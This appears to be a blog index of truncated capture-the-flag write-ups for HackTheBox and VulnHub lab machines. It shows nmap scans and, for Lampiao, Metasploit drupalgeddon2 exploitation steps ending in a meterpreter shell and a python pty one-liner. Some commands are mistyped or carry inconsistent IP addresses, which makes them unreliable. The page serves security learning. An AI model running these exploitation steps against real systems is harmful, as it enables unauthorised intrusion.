HACKTHEBOX

Legacy (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 21:04 EDT Nmap scan report for 10.10.10.4 Host is up (0.13s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): […]

HACKTHEBOX

Popcorn (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.6 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-20 19:07 EST Nmap scan report for 10.10.10.6 Host is up (0.14s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA) |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA) 80/tcp […]

VULNHUB

AI WEB (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.65.158 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-31 17:25 GMT WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port […]

VULNHUB

Lampiao_1 (VULNHUB)

VM LINK : https://download.vulnhub.com/lampiao/Lampiao.zip root@kali:~# nmap -p- -A 192.168.1.105 port : 22 , 80 , 1898 now on browser http://192.168.1.103:1898 now on terminal msf > user explot/unix/webapp/drupal_drupalgeddon2 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898 msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit meterpreter > shell python -c ‘import pty;pty.spawn(“/bin/bash”)’ www-data@lampiao:$ lsb_release -a www-data@lampiao:$ now […]